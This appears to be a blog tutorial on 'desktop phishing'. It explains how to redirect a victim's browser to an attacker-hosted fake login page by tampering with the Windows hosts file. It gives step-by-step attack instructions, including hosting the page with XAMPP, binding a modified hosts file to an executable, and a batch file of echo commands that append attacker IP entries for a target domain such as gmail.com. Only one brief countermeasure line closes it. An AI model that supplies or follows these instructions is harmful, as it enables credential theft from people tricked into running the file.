Though phishing and desktop phishing sounds similar, there is a lot of difference between the two terms. desktop phishing is an advanced form of phishing. Now in this tutorial we will have a close look on both terms.
normal phishing:
Phishing is nothing but convincing the attacker to login to the fake page. It follows a sequence of steps. they are as follows:
Step:1 Attacker convinces the victim to login to the fake page which resemble to the genuine web page.
Step:2 victim enters his/her credentials in the fake page send by the attacker.
Step 3 All the credentials entered in the fake page will be received to the attacker.
Step 4 The victim is now redirected to an error page or the genuine website depending on the attacker.
The main drawback of phishing is that the victim can easily difference between the fake page and the original page by looking at the domain name. So in order to overcome this problem desktop phishing is introduced.
Desktop phishing:
This process is as simple as phishing but instead of sending a fake link to the victim, the attacker sends an executable batch file i.e, dot exe file
The victim needs to double click on the received executable file. The attacker's job is now done.
Major advantage of this type of phishing is that the victim enters the original web address but he will be redirected to the fake attacker's page. The domain name remains same as the original address.
Rest of the things are same as normal phishing.
What is a host file?
The host file is a text file containing domain names and IP address associated with them.
Location of host file in windows: C:\Windows\System32\drivers\etc\
Whenever we visit any website say www.sample.com , a query is sent to domain name server DNS. to lookup for IP address associated with that website/domain. But before doing this the host file on our local computer is checked for the ip address associated to the domain name.
Suppose we make an entry in the host file as shown say www.sample.com it would be taken to 115.124.124.50 No query for resolving ip adress associated with www.sample.com would be sent to domain name server.
So now the attack can be divided into two parts:
Firstly we need to create and host a phishing page on your computer.
Second one is to modify victim's host file.
Step 1} we need to host the phishing page on our computer using a webserver softwares like xampp or wampp. This is because hosting sites we used to upload phishing code will points to the ip address of the webserver but not towards the website.
Step 2) Modifying the host site can be implemented in two different ways:
Method 1) Send victim a zip file containing a modified host file. When zip file would be clicked it would automatically replace victims original file to modified host file.
Copy your host file and paste it anywhere. modify it according to yourself. Edit it with any text editor and associate your public address with domain you wish as show
When the victim would visit gmail.com, he would be taken to the website hosted on ip xxx.xxx.xxx.xxx. replace it with your public IP. Compress host's file such that when victim opens it, it automatically gets copied to default location C:\Windows\system32\drivers\etc and victim's hosts file gets replaced by our modified host's file.
Then we can bind this file to an exe like using any binder software. He is supposed to click it and our job done.
Method 2) Create a batch file which would modify our host file as per our need.
open your notepad and enter the following:
echo xxx.xxx.xxx.xxx. www.watever.com >> C:\windows\system32\drivers\etc\hosts
echo xxx.xxx.xxx.xxx watever.com >> C:\windows\system32\drivers\etc\hosts
save the file with .bat extension(mandatory).
When victim would run this file a new entry will be made in host file.
limitations of attack:
1) We need to purchase static ip and isp, since our public ip address id dynamic. so it probably connect and disconnect when it changes everytime
2) The browser may detect the digital certificate.
countermeasures:
Never just blindly enter the credentials in a login page even if you yourself typed a domain name in the web browser. check the protocol whether it is http or https. https is more secure.
No comments:
Post a Comment